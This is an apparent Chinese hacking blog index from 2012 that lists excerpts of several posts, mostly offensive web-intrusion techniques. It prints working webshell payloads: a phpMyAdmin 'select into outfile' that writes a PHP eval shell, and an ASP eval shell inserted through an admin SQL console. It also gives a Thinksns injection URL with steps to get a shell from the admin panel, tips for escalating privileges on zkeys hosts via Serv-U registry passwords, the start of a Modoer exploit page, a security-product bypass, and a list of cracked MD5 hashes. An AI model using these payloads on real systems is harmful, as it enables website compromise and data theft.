phpmyadmin 导出 shell 至中文路径

分类:安全 | 2012-09-27 | 撸过 1,715 次
0人扯谈
set character_set_client='gbk';
set character_set_connection='gbk';
set character_set_database='gbk';
set character_set_results='gbk';
set character_set_server='gbk';
select '<?php eval($_POST[cmd]);?>' into outfile 'd:\www\网站\mm.php';

zkysoft 主机提权方法

分类:安全 | 2012-09-27 | 撸过 569 次
0人扯谈

 

zkeys 默认网站用户权限很低,大部分exp都用不了,如 iis6 exp 就提示无法设置注册表。

提供我成功过的几个方法(不一定有效):

1、如果目标仅仅是旁站的话可以去注册表查 serv-u 的指定用户密码,注册表地址:HKEY_LOCAL_MACHINE\SOFTWARE\cat soft\serv-u\

2、如果要提权的话可以找找有 winwebmail 没,这个东西有的 zkeys 装了,有的没装,如果找到这东西直接去他目录写个 shell,权限就比之前大了,exp 也能提了。

我碰到的几个都是在 d:\winwebmail\web\ 只要有这东西就好办,[......]

继续阅读

Modoer Exp

分类:安全 | 2012-09-27 | 撸过 808 次
0人扯谈

源码:

<html>
<head>
<title> Modoer EXP </title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
</head>
<script language="javascript">
    function expstart() {
            var url = document.forms[0].url.value;
            if(url != ""){[......]

继续阅读

SourceForge被黑客入侵 phpMyadmin被植入后门

分类:新闻 | 2012-09-26 | 撸过 615 次
0人扯谈

2012年9月25日消息,今天微博爆出消息,国外知名下载网站SourceForge韩国CDN节点疑似被入侵,热门下载资源phpMyadmin被植入后门。

SourceForge. net是世界上最大的开源软件开发网站。很多国外非常有用的资源都可以从上面下载。而由于国内目前暂无SourceForge的CDN节点,导致从国内访问下载均是从韩国节点获取数据。对国内用户影响非常大。

20120925072759750

国内用户从韩国节点下载资源包含后门文件

 

phpMyAdmin 是一个用PHP编写的,可以通过 web 方式控制和操作 MySQL 数据库,广泛应用于服务器数据库管理中,在国内绝[......]

继续阅读

Thinksns微博系统注入漏洞即后台拿webshell

分类:安全 | 2012-09-20 | 撸过 652 次
0人扯谈

 

Exp:

http://www.webshell.cc/index.php?app=blog&mod=Index&act=show&id=2211

注入点注入字段

表ts_user

`uid` int(11) NOT NULL AUTO_INCREMENT,
`email` varchar(255) DEFAULT NULL,
`password` varchar(255) DEFAULT NULL,
`admin_level` varchar(255) DEFAULT '0', 用户等级 1为管理员

后台拿shell方法

后台-全局-附件设置-扩展名限定增加php[......]

继续阅读

PHP 5.4 内置web服务器

分类:技术, 新闻 | 2012-09-15 | 撸过 468 次
0人扯谈

PHP是一种脚本语言,它需要PHP解释器来分析运行PHP文件。当把PHP做为CGI服务Web请求时,它需要被嵌入到某种Web服务器里,最常见的是集成到Apache或IIS里,这就是说,在使用PHP前,你需要安装Apache或IIS,并且正确的配置它们和PHP集成的参数。虽然这种配置已经很规范,文档非常丰富,但我们还是经常在安装Apache和PHP集成时遇到问题,而且,有时候我们只想测试一个简单的PHP特征,不想就为此安装、启动Apache服务。

但据官方文档上说,这个内置的Web服务器只是提供开发测试使用,不推荐使用中生产环境中。因为这个服务器接受处理请求时顺序执行的,不能并发处理。[......]

继续阅读

找回系统文件夹选项 文件扩展名办法

分类:技术 | 2012-09-13 | 撸过 544 次
1人扯谈

 

黑阔们往往去网吧的时候无法找到文件扩展名选项很伤脑筋 下面的两种办法足矣对付!

 

找回系统文件夹选项:

方法一:组策略

点击“开始→运行”,在运行对话框中输入“gpedit.msc”命令,点击“确定”按钮后,弹出“组策略”编辑对话框,依次展开“本地计算机策略→用户配置→管理模板→Windows组件→Windows资源管理器”,然后在右侧窗口中找到“从‘工具’菜单删除‘文件夹选项’菜单”选项,鼠标双击打开该选项,在属性对话框中切换到“设置”标签页,你会发现该属性选项已选中了“已启用”单选项,所以屏蔽了“文件夹选项”。这时你只要把该选项设置为“未配置”或“已[......]

继续阅读

个人收藏的部分收费MD5!

分类:安全 | 2012-09-8 | 撸过 1,919 次
1人扯谈

MD5 HASH

84c45962d887564f a66abb5684c45962d887564f08346e8d admin123456

8a1929f5878b794b fbbf0df68a1929f5878b794bbc290f8e 0523213511

fd51ac9e0f2262e4 8720e806fd51ac9e0f2262e47c4e7ddf 06605528808

353acf6cc57272db f58745da353acf6cc57272db3134df7a 123654913

b55ff55babafbacb 87a1c784b55ff55babafbacb[......]

继续阅读

问题ewebeditor编辑器突破安全狗

分类:安全 | 2012-09-5 | 撸过 2,201 次
3人扯谈

 题目说到了问题和突破,问题的ewebeditor程序,这儿程序问题出来哪儿呢?

        1.登陆的地方被删除了,也就是admin_login.asp这个页面被删除了。

        2.是post提交好像有问题,不管点击那个提交post都会跳转到登陆页面,但是登陆页面又没有,如果直接访问那个页面,当然也可以访问。

    当然上边说到的突破,所谓突破也就是说非常规的环境,非常规的手法去实现同一个目的。下面说一下这个非常规的环境。

        1.问题ewebeditor

        2.服务器装有安全

    下面是我测试的过程:

        首先当然是[......]

继续阅读

利用后台SQL查询语句拿webshell

分类:安全 | 2012-09-5 | 撸过 1,161 次
0人扯谈

今天,朋友给了一个比较好玩的后台

 

有SQL查询功能

 

 

在后台的主页,或者备份什么的,可以得到网站的物理路径,这里我没有传马,直接点击了备份数据库,重点是得到物理路径,后台主页,或者各种爆物理路径,还要看运气和自由发挥了

 

以下拿webshell步骤

 

第一句代码

 

create table cmd (a varchar(50))

 

  第二句代码

 

insert into cmd (a) values ('<%evalrequest("qing520")%>[......]

继续阅读

第 1 页,共 2 页12